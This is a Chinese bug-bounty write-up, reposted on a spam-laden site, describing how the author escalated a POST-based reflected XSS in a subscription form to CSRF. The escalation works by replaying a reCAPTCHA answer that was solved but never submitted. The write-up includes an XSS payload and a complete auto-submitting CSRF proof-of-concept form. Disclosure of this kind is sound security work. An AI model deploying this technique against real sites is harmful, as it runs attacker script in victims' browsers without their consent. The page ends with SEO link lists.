当前位置: 首页 > wzjs >正文

创新的医疗网站建设wordpress模板和下载不同

创新的医疗网站建设,wordpress模板和下载不同,东莞网络科技公司有哪些,建一个网站 服务器机房托管价格视频教程在我主页简介或专栏里 (不懂都可以来问我 专栏找我哦) 目录:  确认 XSS 漏洞 确认 CSRF 漏洞 这个漏洞是我在应用程序的订阅表单中发现的一个 XSS 漏洞,只能通过 POST 请求进行利用。通常情况下,基于 POST 的…

视频教程在我主页简介或专栏里

(不懂都可以来问我 专栏找我哦)

目录: 

    确认 XSS 漏洞

 确认 CSRF 漏洞

这个漏洞是我在应用程序的订阅表单中发现的一个 XSS 漏洞,只能通过 POST 请求进行利用。通常情况下,基于 POST 的 XSS 如果没有与 CSRF 结合来展示其影响力,那么这就是一个普通的反射型 XSS(Self XSS)。本来这不会成为一个大问题,但这个表单中实现了 Google reCAPTCHA v2。本文将探讨我是如何绕过 CAPTCHA,从而成功实现 CSRF 攻击的。

图片

为了保持匿名性,我们假设目标网站是 https://www.target.com。当你访问 target.com 时,会看到一个注册和登录表单,但引起我注意的是一个订阅按钮,该按钮会将你引导至 https://www.target.com/subscribe。在这个页面上,会显示一个表单。

图片

提交表单后,我们会收到一条感谢消息,其中显示了我们的名字(例如 John)。

图片

确认 XSS 漏洞

我们可以使用以下 payload 在该字段中测试反射型 XSS 漏洞:

"><svg/onload=confirm(document.domain)>

图片

当我们提交表单时,payload 被成功执行。现在我们已经确认了漏洞的存在,但问题在于,这个漏洞基于 POST 请求,如果没有 CSRF 的配合,它就会变成一个自我 XSS(Self XSS)。

图片

确认 CSRF 漏洞

如果 CAPTCHA 没有被稳健地实现,它并不能保护应用程序免受 CSRF 攻击,主要作用只是提供一定程度的速率限制。在解决 CAPTCHA 后,会生成三个动态参数:captcha_sidcaptcha_token 和 g_recaptcha_response。这里的“动态”是指它们的值会在每次解决 CAPTCHA 时发生变化。要构造一个完美的 CSRF 表单,我们需要能够为这些参数传递有效的值。

图片

那么,如果我在另一个浏览器中解决了 CAPTCHA,但不将其提交到服务器,而是将这些答案重放到 CSRF 表单中,会怎样呢? 我在一个私密标签页中打开了表单页面,填写了表单内容,然后解决了 CAPTCHA。我在 Burp Suite 中启用了拦截功能,并点击了提交。请求被拦截后,我复制了 CAPTCHA 参数的值,并将它们插入到我的 CSRF 漏洞利用演示(PoC)表单中。

<html> <body> <h1>CSRF PoC</h1> <form action="https://www.target.com/subscribe" method="POST"> <input type="hidden" name="name_first" value="'><svg/onload=confirm(document.domain)>" /> <input type="hidden" name="name_last" value="Doe" /> <input type="hidden" name="email_address" value="test@fake.com" /> <input type="hidden" name="company_name" value="FakeCompany" /> <input type="hidden" name="captcha_sid" value="INSERT-HERE" /> <input type="hidden" name="captcha_token" value="INSERT-HERE" /> <input type="hidden" name="captcha_response" value="Google no captcha" /> <input type="hidden" name="g-recaptcha-response" value="INSERT-HERE" /> <input type="hidden" name="captcha_cacheable" value="1" /> <input type="hidden" name="op" value="Submit" /> <input type="hidden" name="form_build_id" value="form-Vwtw-XX&" /> <input type="hidden" name="form_id" value="XX_subscribe_sign_up_form" /> <input type="submit" value="Submit request" /> </form> <script> history.pushState('', '', '/'); document.forms[0].submit(); </script> </body></html>

剩下要做的就是将这个 CSRF 漏洞利用表单托管起来,让受害者访问。受害者访问你的恶意网站后,会被重定向到 https://www.target.com/subscribe,订阅表单会在没有任何交互的情况下自动提交,JavaScript 代码则会在他们的浏览器中执行。

图片

总结来说,CAPTCHA 并未绑定到用户的会话,因此未提交的其他用户的 CAPTCHA 答案可以被重放,用于我们的攻击。

我将这一发现提交给了他们的安全团队,他们迅速确认并修复了这个问题。

图片

视频教程在我主页简介或专栏里

(不懂都可以来问我 专栏找我哦)

申明:本账号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,所有渗透都需获取授权,违者后果自行承担,与本号及作者无关


文章转载自:

http://sgCcsuuG.wcgcm.cn
http://iZb4gLIr.wcgcm.cn
http://ialPMuyV.wcgcm.cn
http://8IOqPyNg.wcgcm.cn
http://agFEQJ6y.wcgcm.cn
http://rHpeKF0t.wcgcm.cn
http://DnXXeOXz.wcgcm.cn
http://iVA1Z8jV.wcgcm.cn
http://tz8K7avd.wcgcm.cn
http://VzSxFgkE.wcgcm.cn
http://vkaKOjFI.wcgcm.cn
http://l00bx2ZN.wcgcm.cn
http://QL9YQkww.wcgcm.cn
http://qsgfVIT3.wcgcm.cn
http://ZiSez7sB.wcgcm.cn
http://e0OAGlNI.wcgcm.cn
http://tRJ1t4Zt.wcgcm.cn
http://Zs0m6Zzy.wcgcm.cn
http://uG4Xq6dj.wcgcm.cn
http://10m5kqoU.wcgcm.cn
http://HyhVv0pc.wcgcm.cn
http://bZ14CbBD.wcgcm.cn
http://goeUZWcB.wcgcm.cn
http://qHH3yESp.wcgcm.cn
http://9a5vtT9F.wcgcm.cn
http://psoSvY6b.wcgcm.cn
http://HUUERIdW.wcgcm.cn
http://4ofLqtkl.wcgcm.cn
http://t2vbXe7h.wcgcm.cn
http://4cByv4KX.wcgcm.cn
http://www.dtcms.com/wzjs/690403.html

相关文章:

  • 如何建手机销售网站seo实战密码第三版pdf下载
  • 黑龙江建设网官方网站外贸推广是做什么的
  • 2021网站无需下载急急急哪家网站做民宿好
  • 比较常见的网页制作工具优化绿松石什么意思
  • 铁岭网站建设公司中国建设监理协会化工监理协会网站
  • 网站开发视频代码淮南装饰公司网站建设
  • 绍兴的网站建设公司竞拍网站做烂了
  • 丹东做网站哪家好在iis上部署的网站本机无法浏览解决方法
  • 秦皇岛网站开发多少钱现在什么网站做外贸的最好
  • 娱乐类网站怎么建设能源与动力工程
  • 网站例子wordpress 默认播放器
  • 互联网网站商标it外包服务提供商有哪些
  • 口碑好的邯郸网站建设自己做的网站加载不出验证码
  • asp.net 网站计数器wordpress上传漏洞
  • 网站建设优化多少钱ie 常用网站
  • 淄博网站建设优化公司wordpress 连接qq视频
  • 金华专业网站建设公司河池网站推广
  • 想找人做网站昆山网络推广公司
  • 辽宁省交通建设投资集团官方网站上海史特信息技术有限公司
  • 做网站和论坛区别企业vi设计策划公司企业vi设计公司
  • 住房与城乡建设部网站商丘网吧什么时候恢复营业
  • 龙岗网站建设网站制作百度统计app
  • 去年做哪个网站能致富logo免费制作平台
  • 建设交通人才网站如何编辑网站标题栏
  • 网站常见结构有那些网站建设极地网
  • H5 网站网络水果有哪些网站可以做
  • 沈阳百度网站排名互联网保险上市公司
  • 深圳网站制作比较好公司wordpress获取作者的权限
  • 资源共享网站开发wordpress visual composer主题
  • 网站这么设置微信支付宝wordpress同步qq空间